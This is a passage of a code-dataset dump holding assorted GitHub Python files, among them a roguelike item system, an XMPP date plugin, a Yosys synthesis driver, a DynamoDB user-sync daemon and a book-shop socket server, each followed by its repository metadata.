Initialized to None.\n \"\"\"\n def __init__(self, item_desc, weight=0,\n item_type=None,\n use_function=None,\n value=0):\n\n self.item_desc = item_desc\n self.weight = weight\n self.item_type = item_type\n self.use_function = use_function\n self.value = value\n self.container = None\n self.hover_sound_played = False\n\n def pick_up(self, actor):\n \"\"\"Picks up the item and either places it into the `actor`'s inventory, or directly used upon picking up.\n\n Parameters\n ----------\n actor : ObjActor\n The actor object (usually PLAYER) that will hold the item after pick up.\n\n Returns\n -------\n None\n \"\"\"\n if self.item_type == \"gold\":\n globalvars.ASSETS.sfx_coin_pickup.play()\n actor.gold += self.value\n\n self.owner.animation_del()\n globalvars.GAME.current_objects.remove(self.owner)\n\n game.game_message(f\"Gained {self.value} gold.\", constants.COLOR_YELLOW)\n game.game_message(f\"Player now has {actor.gold} gold total.\", constants.COLOR_WHITE)\n return\n\n elif self.item_type == \"Red Soul\":\n globalvars.ASSETS.sfx_soul_consume.play()\n actor.exp_total += self.value\n\n self.owner.animation_del()\n globalvars.GAME.current_objects.remove(self.owner)\n return\n\n if actor.container:\n if self.item_type == \"Pure Soul\":\n globalvars.ASSETS.sfx_pure_soul_consume.play()\n actor.container.inventory.append(self.owner)\n self.container = actor.container\n self.use()\n globalvars.GAME.current_objects.remove(self.owner)\n return\n\n if actor.container.weight + self.weight > actor.container.max_weight:\n game.game_message(\"Not enough room to pick up\", constants.COLOR_WHITE)\n\n else:\n globalvars.ASSETS.sfx_item_pickup.play()\n game.game_message(f\"Picked up [{self.owner.display_name}]\")\n actor.container.inventory.append(self.owner)\n\n self.owner.animation_del()\n globalvars.GAME.current_objects.remove(self.owner)\n\n self.container = actor.container\n\n def drop(self, new_x, new_y):\n \"\"\"Drops this item onto the ground specified by the (`new_x`,`new_y`) map-grid coordinates.\n\n Parameters\n ----------\n new_x : int\n The map-grid x-coord to drop the item (usually PLAYER's current position).\n new_y : int\n The map-grid y-coord to drop the item (usually PLAYER's current position).\n\n Returns\n -------\n None\n \"\"\"\n\n # inserting underneath any creature or PLAYER but above any objects already on that tile\n insert_position = 0\n for i, obj in enumerate(reversed(globalvars.GAME.current_objects)):\n if obj.item and obj.x == new_x and obj.y == new_y:\n insert_position = i\n break\n\n globalvars.GAME.current_objects.insert(insert_position, self.owner)\n\n self.owner.animation_init()\n\n if self.owner in self.container.inventory:\n self.container.inventory.remove(self.owner)\n elif self.owner in self.container.equipped_inventory:\n self.container.equipped_inventory.remove(self.owner)\n\n self.owner.x, self.owner.y = new_x, new_y\n game.game_message(f\"Dropped [{self.owner.display_name}]\")\n\n def use(self):\n \"\"\"Uses the item to produce an effect and removes it from the inventory.\n\n Passes in the caster (the creature/actor using the item) and any value associated to the\n use_function.\n\n Returns\n -------\n None\n \"\"\"\n if self.owner.equipment:\n self.owner.equipment.toggle_equip()\n return\n\n if self.use_function:\n used = self.use_function(self.container.owner, self.value)\n if used:\n self.container.inventory.remove(self.owner)\n elif self.item_type == \"Pure Soul\":\n self.container.inventory.remove(self.owner)\n\n\nclass ComEquipment:\n \"\"\"Equipment 
component class that gives item objects extra combat bonuses and statuses.\n\n Attributes\n ----------\n attack_bonus : int\n Value of additional damage a wielder will gain when equipped.\n defence_bonus : int\n Value of additional defence a wielder will gain when equipped.\n slot : str\n The slot that the equipment will occupy (Right, Left, Body, Legs, Feet, Head).\n equipped : bool\n True if the item is equipped.\n \"\"\"\n def __init__(self, attack_bonus=0, defence_bonus=0, slot=None):\n\n self.attack_bonus = attack_bonus\n self.defence_bonus = defence_bonus\n self.slot = slot\n\n self.equipped = False\n\n def toggle_equip(self):\n \"\"\"Toggles the equipment on and off.\n\n Returns\n -------\n None\n \"\"\"\n if self.equipped:\n self.unequip()\n else:\n self.equip()\n\n def equip(self):\n \"\"\"Equips the item and sets the equipped attribute to True.\n\n Checks the slot of the equipment to see if that particular slot is already occupied.\n If the slot is empty, set equipped attribute to true.\n\n Returns\n -------\n None\n \"\"\"\n all_equipped_items = self.owner.item.container.equipped_inventory\n\n if len(all_equipped_items) > 0:\n for equipped_item in all_equipped_items:\n if equipped_item.equipment.slot == self.slot:\n game.game_message(f\"There is already an item in the {self.slot} slot!\",\n constants.COLOR_WHITE)\n self.equipped = False\n return\n\n self.equipped = True\n game.game_message(f\"Equipped [{self.owner.object_name}] in the {self.slot} slot\")\n\n def unequip(self):\n \"\"\"Unequips the item and sets the equipped attribute to False.\n\n Returns\n -------\n None\n \"\"\"\n self.equipped = False\n game.game_message(f\"Unequipped [{self.owner.display_name}]\")\n","repo_name":"PeterBohai/tower-of-rak","sub_path":"src/components/itemcom.py","file_name":"itemcom.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18162804993","text":"def get_holiday(sdate):\n\n\t''' Function get holiday from file plugins/date.txt and return title of\n\tholiday if holiday found, else return empty unicode message. Input params\n\tmust be\tlist of int\n\n\t:[month, day]:'''\n\n\tresult = ''\n\tdate_base = readfile(date_file).decode('UTF').split('\\n')\n\tfor ddate in date_base:\n\t\tif ddate != '\\n' or ddate != '':\n\t\t\tddate = ddate.split('-')\n\t\t\thdate = ddate[0]\n\t\t\tif '.' 
in hdate:\n\t\t\t\thdate = map(int, hdate.split('.'))\n\t\t\t\thdate.reverse()\n\t\t\t\tif hdate == sdate:\n\t\t\t\t\tresult += ddate[1].strip() + ', '\n\tif len(result) > 2: result = result[:-2]\n\treturn result\n\ndef parse_date_string(string_date, spl='.'):\n\n\t''' Parse date string and return list [year, month, day] '''\n\n\tdate_formats = ['%d'+spl+'%m', '%d'+spl+'%m'+spl+'%y',\n\t\t'%d'+spl+'%m'+spl+'%Y', '%Y'+spl+'%m'+spl+'%d']\n\t#output = list(time.localtime())[:3]\n\tfor format in date_formats:\n\t\ttry: output = list(time.strptime(string_date, format))[:3]\n\t\texcept: pass\n\treturn output\n\ndef to_date(type, jid, nick, text):\n\tdmass = (L('days','%s/%s'%(jid,nick)), L('day','%s/%s'%(jid,nick)), L('Days','%s/%s'%(jid,nick)).lower(), L('Days','%s/%s'%(jid,nick)).lower(),\n\t\tL('Days','%s/%s'%(jid,nick)).lower(), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)))\n\tsplitters = ('.', '-', ':', '/', ',', '\\\\')\n\tif len(text):\n\t\ttry:\n\t\t\tspl = [spl for spl in splitters if spl in text][0]\n\t\t\tsdate = parse_date_string(text, spl)\n\t\t\tif sdate[0] == 1900: sdate[0] = list(time.localtime())[0]\n\t\t\tyear = sdate.pop(0)\n\t\t\tmonth, day = sdate\n\t\t\thday = get_holiday(sdate)\n\t\t\ttext = text.replace(spl, '.')\n\t\t\tmsg = ''\n\t\t\tif len(hday) > 0: text = hday\n\t\t\tdays_remain = (datetime.date(year, month, day) - datetime.date.today()).days\n\t\t\tif len(str(abs(days_remain))) > 1 and str(days_remain)[-2] == '1':\n\t\t\t\tdmass = (L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)))\n\t\t\tif days_remain < 0: msg += L('was %s %s ago','%s/%s'%(jid,nick)) % \\\n\t\t\t\t(str(abs(days_remain)), dmass[int(str(days_remain)[-1])])\n\t\t\telif days_remain == 0: msg += L('today','%s/%s'%(jid,nick))\n\t\t\telse: msg += L('will be in %s %s','%s/%s'%(jid,nick)) % \\\n\t\t\t\t(str(abs(days_remain)), dmass[int(str(days_remain)[-1])])\n\t\t\tmsg = text + ' ' + msg\n\t\texcept: msg = L('Error in parameters. Read the help about command.','%s/%s'%(jid,nick))\n\telse: msg = L('Error in parameters. 
Read the help about command.','%s/%s'%(jid,nick))\n\tsend_msg(type, jid, nick, msg)\n\ndef todate(type, jid, nick, text):\n\tdmass = (L('days','%s/%s'%(jid,nick)), L('day','%s/%s'%(jid,nick)), L('Days','%s/%s'%(jid,nick)).lower(), L('Days','%s/%s'%(jid,nick)).lower(),\n\t\tL('Days','%s/%s'%(jid,nick)).lower(), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)))\n\tsplitters = ('.', '-', ':', '/', ',', '\\\\')\n\tmsg = ''\n\tif len(text):\n\t\ttry:\n\t\t\tif ' ' in text: ddate, msg = text.split(' ', 1)[0], text.split(' ', 1)[1]\n\t\t\telse: ddate = text\n\t\t\tspl = [spl for spl in splitters if spl in ddate][0]\n\t\t\tif len(msg) == 0: msg = L('before the %s remained','%s/%s'%(jid,nick)) % ddate.replace(spl, '.')\n\t\t\tsdate = parse_date_string(ddate, spl)\n\t\t\tif sdate[0] == 1900: sdate[0] = list(time.localtime())[0]\n\t\t\tyear = sdate.pop(0)\n\t\t\tmonth, day = sdate\n\t\t\tdays_remain = (datetime.date(year, month, day) - datetime.date.today()).days\n\t\t\tif len(str(abs(days_remain))) > 1 and str(days_remain)[-2] == '1':\n\t\t\t\tdmass = (L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)))\n\t\t\tif days_remain < 0: msg = L('Date has already in past!','%s/%s'%(jid,nick))\n\t\t\telse: msg += ' %s %s' % (days_remain,dmass[int(str(days_remain)[-1])])\n\t\texcept: msg = L('Error in parameters. Read the help about command.','%s/%s'%(jid,nick))\n\telse: msg = L('Error in parameters. Read the help about command.','%s/%s'%(jid,nick))\n\tsend_msg(type, jid, nick, msg)\n\nglobal execute\n\nexecute = [(3, 'to_date', to_date, 2, 'Calculate count of days for requested date, if the date is holiday, that returned title of holiday.\\nSupported date formats: dd.mm.yyyy, dd.mm, dd.mm.yy, yyyy.mm.dd\\nSupported splitters: ,-.:/\\\\\\ntodate 05.09\\ntodate 5/9/2010'),\n\t(3, 'todate', todate, 2, 'Calculate count of days for requested date.\\nSupported date formats: dd.mm.yyyy, dd.mm, dd.mm.yy, yyyy.mm.dd\\nSupported splitter: ,-.:/\\\\\\ntodate 05.09 before New year remained\\ntodate 5/9/2010 before New year remained')]\n","repo_name":"isida/4","sub_path":"plugins/todate.py","file_name":"todate.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"21"} +{"seq_id":"29964730933","text":"from collections import Counter\nfrom sys import stdin\ndef arithmetic_geometric_mean(n, NumList=[]):\n return round(sum(NumList)/n)\ndef median(n, NumList=[]):\n if n==1:\n return NumList[0] \n NumList.sort()\n return (NumList)[int((n)/2)]\n\ndef mode(n, NumList=[]):\n if n==1:\n return NumList[0] \n count = Counter(NumList).most_common()\n\n modes = []\n for num in count:\n if num[1] == count[0][1]:\n modes.append(num[0])\n\n modes.sort()\n if len(modes) > 1:\n return modes[1]\n else:\n return modes[0]\n\ndef rng(n, NumList=[]):\n if n == 1:\n return 0\n NumList.sort()\n return NumList[-1]-NumList[0]\n\nn = int(stdin.readline())\nNumList = []\nfor i in range(n):\n NumList.append(int(stdin.readline()))\n\nprint(arithmetic_geometric_mean(n, NumList))\nprint(median(n, NumList))\nprint(mode(n, NumList))\nprint(rng(n, 
NumList))","repo_name":"GDSC-SCH/2021-GDSCSCH-AlgorithmStudy","sub_path":"15_이준용/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18526329072","text":"from absl import flags\nfrom absl import app\nimport os\n\nFLAGS = flags.FLAGS\nflags.DEFINE_integer (\"i\", 8, \"Number of inputs\")\nflags.DEFINE_integer (\"s\", 3, \"Number of select bits\")\nflags.DEFINE_integer (\"o\", 1, \"Width of output\")\n\nnum_inputs = None\nnum_selects = None\nnum_outputs = None\n\ndef init_setup ():\n global num_inputs, num_selects, num_outputs\n num_inputs = FLAGS.i\n num_selects = FLAGS.s\n num_outputs = FLAGS.o\n return\n\n\ndef gen_yoscript ():\n global num_inputs, num_selects, num_outputs\n read_file = open (\"yosys_verilog/mux_param_template.v\", \"r\")\n write_file = open (\"yosys_verilog/mux_param.v\", \"w\")\n\n lines = read_file.readlines ()\n for line in lines:\n if \"*NUM_INPUTS\" in line:\n write_file.write (\"\\tparameter NUM_INPUT = {},\\n\".format (num_inputs))\n elif \"*NUM_SELECTS\" in line:\n write_file.write (\"\\tparameter SEL_WIDTH = {},\\n\".format (num_selects))\n elif \"*NUM_OUTPUTS\" in line:\n write_file.write (\"\\tparameter DATA_WIDTH = {},\\n\".format (num_outputs))\n else:\n write_file.write (line)\n return\n\n\ndef run_gate_synthesis ():\n os.chdir (\"yosys_script\")\n os.system (\"yosys mux_param.ys\")\n\n\ndef run_sfq_synthesis ():\n global num_inputs, num_selects, num_outputs\n os.chdir (\"../\")\n os.system (\"python sfq_gate_analysis.py --un mux_{}_{}_{} --vlg synth_vlg/synth_mux_param.v\".format \\\n (num_inputs, num_selects, num_outputs))\n\n\ndef main (argv):\n init_setup ()\n gen_yoscript ()\n run_gate_synthesis ()\n run_sfq_synthesis ()\n\n\nif __name__ == \"__main__\":\n app.run (main)\n","repo_name":"SNU-HPCS/QIsim","sub_path":"device_model/rsfq/drive_mux.py","file_name":"drive_mux.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"34324518668","text":"import os, glob, torch\nimport numpy as np\n\nfrom PIL import Image\n\ndef load_model(model,filepath):\n state_dict = torch.load(filepath)\n new_state_dict= {}\n oldkeys = state_dict.copy().keys()\n\n #eliminate prefix module. 
concated by using nn.Dataparallel function\n for key in oldkeys:\n prefix_loc = key.find('module.')\n if prefix_loc == 0:\n newkey = key.replace(\"module.\",\"\",1)\n new_state_dict[newkey] = state_dict.pop(key)\n model.load_state_dict(new_state_dict)\n\n return model\n\ndef remove_small_images(datasetpath, minimum=296):\n Dataset_PATH = datasetpath\n imagelist = os.listdir(Dataset_PATH)\n \n length = len(imagelist)\n removelist = []\n print(\"investigate {} images\".format(length))\n\n for i,imagename in enumerate(imagelist):\n imagepath = os.path.join(Dataset_PATH,imagename)\n image = Image.open(imagepath)\n imagesize = np.array(image).shape\n \n if (imagesize[0] /external/microsoft',\n resource_class_args=args,\n )\n","repo_name":"wazo-platform/wazo-auth","sub_path":"wazo_auth/plugins/external_auth/microsoft/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"18322725493","text":"import argparse\nfrom util.utils import realpath, is_dir, is_file, input_exist, filename_and_extension\n\n\ndef proccess_dir(directory, extension):\n directory = realpath(directory)\n\n if not is_dir(directory):\n raise argparse.ArgumentTypeError(f'{directory} is not an existing directory!')\n\n if not input_exist(directory, extension):\n raise argparse.ArgumentTypeError(f'No files with {extension} extension exits in {directory}')\n\n return directory\n\n\ndef proccess_file(file):\n try:\n f = realpath(file)\n except Exception:\n return None\n\n if not is_file(f):\n raise argparse.ArgumentTypeError(f'{file} is not an existing file!')\n\n return f\n\n\ndef proccess_filename(filename, default_settings):\n filename, extension = filename_and_extension(filename)\n\n if extension and extension != default_settings.output_extension:\n print(f'ignoring extension {extension}! 
Using {default_settings.output_extension}')\n\n return realpath(filename)\n\n\ndef resolve_encoding(encoding_quality, default_settings):\n if encoding_quality is None:\n return default_settings.encoder, default_settings.encoding_quality\n else:\n return 'x265', encoding_quality\n\n\ndef positive_int(v):\n def fail():\n raise argparse.ArgumentTypeError('Positive Integer value expected.')\n\n try:\n result = int(v)\n if result < 0:\n fail()\n return result\n except Exception:\n fail()\n\n\ndef positive_float(v):\n def fail():\n raise argparse.ArgumentTypeError('Positive Float value expected.')\n\n try:\n result = float(v)\n if result < 0:\n fail()\n return result\n except Exception:\n fail()\n\n\ndef x265_preset_int(v):\n def fail():\n raise argparse.ArgumentTypeError('Integer 0-8 expected.')\n\n try:\n result = int(v)\n if result < 0 or result > 8:\n fail()\n return result\n except Exception:\n fail()\n","repo_name":"atiratree/timelapse-to-video","sub_path":"arg_parses/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32320923277","text":"from command import ActionBinder\nfrom recognition import VoiceTranslator\nfrom ui import ConsoleUI\nfrom speaker import Speaker\nfrom listener import Listener\nfrom functions import actual_commands, goodbye, current_time, light_off, light_on, love_you, tell_it\nimport serial\n\n\nif __name__ == \"__main__\":\n serial_is_used_for_arduino = False\n if serial_is_used_for_arduino:\n ser = serial.Serial('/dev/ttyUSB0')\n \n\n aliases = dict()\n vt = VoiceTranslator()\n ui = ConsoleUI()\n cm = ActionBinder(vt, aliases)\n\n\n cm.bind_action(ui, goodbye)\n cm.bind_action(ui, current_time)\n cm.bind_action(ui, love_you)\n \n if serial_is_used_for_arduino:\n cm.bind_action(ui, light_on)\n cm.bind_action(ui, light_off)\n cm.bind_action(ui, actual_commands, aliases)\n cm.bind_action_mannualy(('Lustereczko powiedz przecie kto jest najpiękniejszy w świecie',), tell_it)\n\n l = Listener((\"Cześć Tomek\", \"Cześć Tomku\", \"Tomek\", \"Tomku\"), cm.aliases, vt)\n l.start_listen()\n\n\n if serial_is_used_for_arduino:\n ser.close()\n\n print(\"it is done\")","repo_name":"WojciechBogobowicz/Voice-menager-module","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16028053444","text":"# Greedy algorithm, Silver 4: ATM\n# Minimize the total time spent withdrawing money\n\nn = int(input())\np = list(map(int, input().split()))\nk = 0\np.sort()\narr = []\nfor i in range(n):\n k += p[i]\n arr.append(k)\n\nprint(sum(arr))\n","repo_name":"lookinmin/algorithm_study","sub_path":"week10/bakjoon_11399.py","file_name":"bakjoon_11399.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34631727604","text":"\"\"\"\nDaemon for keeping users in-sync with the DynamoDB table.\n\"\"\"\nfrom logging import getLogger\nfrom random import randint\nfrom time import sleep\nfrom typing import Any, Dict\nimport botocore # pylint: disable=W0611\nfrom .constants import (\n KEY_FULL_UPDATE_JITTER, KEY_FULL_UPDATE_PERIOD,\n KEY_GROUP_TABLE_NAME, KEY_USER_TABLE_NAME)\nfrom .group import Group\nfrom .shadow import ShadowDatabase\nfrom .user import User\n\n# pylint: disable=C0103\n\nlog = getLogger(__name__)\n\nclass Daemon():\n \"\"\"\n Runtime daemon for process control.\n 
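Example wiring (a sketch; it assumes a boto3 DynamoDB client and uses the\n config keys imported above):\n\n import boto3\n daemon = Daemon(boto3.client(\"dynamodb\"), {KEY_FULL_UPDATE_PERIOD: 3600})\n daemon.main_loop()\n 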
\"\"\"\n\n def __init__(\n self, ddb: \"botocore.client.DynamoDB\", config: Dict[str, Any]) -> None:\n \"\"\"\n Daemon(ddb: botocore.client.DynamoDB, user_table_name: str, group_table_name: str) -> Daemon\n Create a new Daemon for keeping users up-to-date.\n \"\"\"\n super(Daemon, self).__init__()\n self.ddb = ddb\n self.config = config\n self.shadow = ShadowDatabase()\n self.dynamodb_users = {} # type: Dict[str, User]\n self.dynamodb_groups = {} # type: Dict[str, Group]\n\n def reload_users(self) -> None:\n \"\"\"\n daemon.load_users() -> None\n Reload the entire users table.\n \"\"\"\n table_name = self.config.get(KEY_USER_TABLE_NAME, \"Users\")\n log.info(\"Reloading users from DynamoDB table %s\", table_name)\n\n users = {} # type: Dict[str, User]\n paginator = self.ddb.get_paginator(\"scan\")\n page_iterator = paginator.paginate(\n TableName=table_name, ConsistentRead=True)\n\n # We rely entirely on the Boto3 client to retry failed reads here.\n for page in page_iterator:\n items = page.get(\"Items\", [])\n for item in items:\n username = item[\"Name\"][\"S\"]\n assert username not in users\n\n user = self.shadow.users.get(username)\n if user is None:\n user = User.from_dynamodb_item(item)\n self.shadow.users[username] = user\n else:\n user.update_from_dynamodb_item(item)\n\n users[username] = user\n\n self.dynamodb_users = users\n\n def reload_groups(self) -> None:\n \"\"\"\n daemon.reload_groups() -> None\n Reload the entire groups table.\n \"\"\"\n table_name = self.config.get(KEY_GROUP_TABLE_NAME, \"Groups\")\n log.info(\"Reloading groups from DynamoDB table %s\", table_name)\n\n groups = {} # type: Dict[str, Group]\n paginator = self.ddb.get_paginator(\"scan\")\n page_iterator = paginator.paginate(\n TableName=table_name, ConsistentRead=True)\n\n # We rely entirely on the Boto3 client to retry failed reads here.\n for page in page_iterator:\n items = page.get(\"Items\", [])\n for item in items:\n groupname = item[\"Name\"][\"S\"]\n assert groupname not in groups\n\n group = self.shadow.groups.get(groupname)\n if group is None:\n group = Group.from_dynamodb_item(item)\n self.shadow.groups[groupname] = group\n else:\n group.update_from_dynamodb_item(item)\n\n groups[groupname] = group\n\n self.dynamodb_groups = groups\n\n def full_update(self) -> None:\n \"\"\"\n daemon.full_update()\n Perform a full update by scanning the entire DynamoDB table and adding\n users who exist in DynamoDB but not locally, deleting users who exist\n locally but not in DynamoDB, and updating any users who exist in both\n repositories.\n \"\"\"\n # First, refetch everything from DynamoDB\n self.reload_groups()\n self.reload_users()\n\n # Rewrite the /etc/group, /etc/passwd, /etc/gshadow, and\n # /etc/shadow files.\n if self.shadow.modified:\n log.info(\"Shadow database modified; rewriting\")\n self.shadow.write()\n\n # For each DynamoDB user, make sure they have a valid home and ssh keys.\n for user in self.dynamodb_users.values():\n try:\n self.shadow.create_user_home(user)\n self.shadow.write_user_ssh_keys(user)\n except Exception as e: # pylint: disable=W0703\n log.error(\"Failed to create/update user %s: %s\", user.name, e,\n exc_info=True)\n\n def main_loop(self) -> None:\n \"\"\"\n daemon.main_loop() -> None\n Run continuously until interrupted, polling the DynamoDB table and\n rewriting the shadow files (if needed) periodicially.\n\n The periodicity is controlled by the following config keys:\n full_update_period \n The interval, in seconds, between polls. 
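(Each cycle sleeps for jitter + period in total, so period=3600 with a\n jitter of up to 600 gives one poll roughly every 60 to 70 minutes.) 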
If unspecified, this\n defaults to 3600 seconds (1 hour).\n\n full_update_jitter \n Maximum jitter, in seconds, to add to the period. This prevents\n many instances of DynamoDBUserManager from simultaneously\n overloading DynamoDB. If unspecified, this defaults to\n 600 seconds (10 minutes)\n \"\"\"\n log.info(\"Starting main_loop\")\n while True:\n jitter_max = self.config.get(KEY_FULL_UPDATE_JITTER, 600)\n jitter = randint(0, jitter_max)\n log.info(\n \"Jitter sleeping for %d seconds (of %d maximum)\", jitter,\n jitter_max)\n\n sleep(jitter)\n\n log.info(\"Executing full update\")\n try:\n self.full_update()\n log.info(\"Full update completed successfully\")\n except Exception as e: # pylint: disable=W0703\n log.error(\"Full update failed: %s\", e, exc_info=True)\n\n period = self.config.get(KEY_FULL_UPDATE_PERIOD)\n log.info(\"Regular sleeping for %d seconds\", period)\n sleep(period)\n\n # For testing purposes\n self.main_loop_done_hook()\n\n def main_loop_done_hook(self) -> Any: # pragma: nocover\n \"\"\"\n daemon.main_loop_done_hook() -> None\n Hook method called at the end of main_loop. Not used except in unit\n tests as an escape hatch.\n \"\"\"\n # pylint: disable=R0201\n return\n","repo_name":"dacut/dynamodb-user-manager","sub_path":"dynamodbusermanager/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19943601216","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nclass win:\n batch = None\n @staticmethod\n def symlink(src, dst):\n if not win.batch:\n win.batch = open('symbolic.cmd', 'w')\n win.batch.write('@ECHO OFF\\n')\n win.batch.write('MKLINK /J %s %s\\n' % (dst, src))\n\ndef accounts():\n prefix = os.path.join('WTF', 'Account')\n foo = os.path.join(prefix, '83215426#1')\n bar = ['150998550#1', '150998550#2', '223607616#1', '223607616#2', 'WOW_TAB']\n for path in [os.path.join(prefix, e) for e in bar]:\n if sys.platform.startswith('win'):\n win.symlink(foo, path)\n else:\n os.symlink(foo, path)\n\ndef characters():\n prefix = os.path.join('WTF', 'Account', '83215426#1')\n foo = os.path.join(prefix, 'Tichondrius', 'Masoshonen')\n bar = [\n 'Tichondrius - Morgiane', 'Tichondrius - Morgianu',\n 'Stormrage - Masoshonen',\n '熊猫酒仙 - 魔装少年', '凤凰之神 - 依然活著', '凤凰之神 - 仍然活著',\n ]\n for path in [os.path.join(prefix, *c.split(' - ')) for c in bar]:\n if sys.platform.startswith('win'):\n win.symlink(foo, path)\n else:\n os.symlink(foo, path)\n \ndef main():\n accounts()\n characters()\n if win.batch:\n win.batch.write('PAUSE')\n win.batch.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"jki14/nichijou-scripts","sub_path":"wow/symbolic/retail/symbolic.py","file_name":"symbolic.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37362432686","text":"import socket\nimport threading\nimport random\nprevious_orders = {}\n\n# dictionary of books and their details\nbooks = {\n 101: {\"name\": \"More Peak District\", \"price\": 12.99, \"inventory\": 10},\n 102: {\"name\": \"Lincolnshire Wolds\", \"price\": 10.99, \"inventory\": 10},\n 103: {\"name\": \"Vale of York\", \"price\": 11.99, \"inventory\": 10},\n 104: {\"name\": \"Peak District\", \"price\": 12.99, \"inventory\": 10},\n 105: {\"name\": \"Snowdonia\", \"price\": 13.99, \"inventory\": 10},\n 106: {\"name\": \"Malvern and Warwickshire\", \"price\": 10.99, \"inventory\": 10},\n 107: 
{\"name\": \"Cheshire\", \"price\": 12.99, \"inventory\": 10}\n}\n# dictionary of walks and their details\nwalks = [\n {\"area\": \"PeakDistrict\", \"book\": \"More Peak District\", \"name\": \"Hathasage\", \"distance\": 7, \"difficulty\": \"Easy\", \"page\": 67},\n {\"area\": \"PeakDistrict\", \"book\": \"More Peak District\", \"name\": \"Hope and Win Hill\", \"distance\": 4.5, \"difficulty\": \"Medium\", \"page\": 18},\n {\"area\": \"Lincolnshire\", \"book\": \"Lincolnshire Wolds\", \"name\": \"Thornton Abbey\", \"distance\": 3.5, \"difficulty\": \"Easy\", \"page\": 20},\n {\"area\": \"Lincolnshire\", \"book\": \"Lincolnshire Wolds\", \"name\": \"Tennyson County\", \"distance\": 5, \"difficulty\": \"Hard\", \"page\": 28},\n {\"area\": \"York\", \"book\": \"Vale Of York\", \"name\": \"Cowlam and Cotham\", \"distance\": 8, \"difficulty\": \"Hard\", \"page\": 64},\n {\"area\": \"York\", \"book\": \"Vale of York\", \"name\": \"Fridaythorpe\", \"distance\": 7, \"difficulty\": \"Easy\", \"page\": 42},\n {\"area\": \"PeakDistrict\", \"book\": \"Peak District\", \"name\": \"Magpie Mine\", \"distance\": 4.5, \"difficulty\": \"Medium\", \"page\": 20},\n {\"area\": \"PeakDistrict\", \"book\": \"Peak District\", \"name\": \"Lord’s Seat\", \"distance\": 5.5, \"difficulty\": \"Easy\", \"page\": 28},\n {\"area\": \"NorthWales\", \"book\": \"Snowdonia\", \"name\": \"Around Aber\", \"distance\": 4, \"difficulty\": \"Hard\", \"page\": 24},\n {\"area\": \"NorthWales\", \"book\": \"Snowdonia\", \"name\": \"Yr Eifl\", \"distance\": 3.5, \"difficulty\": \"Medium\", \"page\": 42},\n {\"area\": \"Warwickshire\", \"book\": \"Malvern and Warwickshire\", \"name\": \"Edge Hill\", \"distance\": 4, \"difficulty\": \"Easy\", \"page\": 28},\n {\"area\": \"Warwickshire\", \"book\": \"Malvern and Warwickshire\", \"name\": \"Bidford-UponAvon\", \"distance\": 8.5, \"difficulty\": \"Medium\", \"page\": 78},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Dane Valley\", \"distance\": 8.5, \"difficulty\": \"Easy\", \"page\": 20},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Malpas\", \"distance\": 8.5, \"difficulty\": \"Medium\", \"page\": 80},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Farndon\", \"distance\": 8.5, \"difficulty\": \"Hard\", \"page\": 48},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Delamere Forest\", \"distance\": 5.5, \"difficulty\": \"Easy\", \"page\": 30}]\n\norders = {}\ndef levenshtein_distance(s1, s2):\n if len(s1) > len(s2):\n s1, s2 = s2, s1\n\n distances = range(len(s1) + 1)\n for i2, c2 in enumerate(s2):\n new_distances = [i2 + 1]\n for i1, c1 in enumerate(s1):\n if c1 == c2:\n new_distances.append(distances[i1])\n else:\n new_distances.append(1 + min((distances[i1], distances[i1 + 1], new_distances[-1])))\n distances = new_distances\n return distances[-1]\n\ndef find_closest_match(word, word_list):\n distances = [levenshtein_distance(word, w) for w in word_list]\n closest_match_index = distances.index(min(distances))\n return 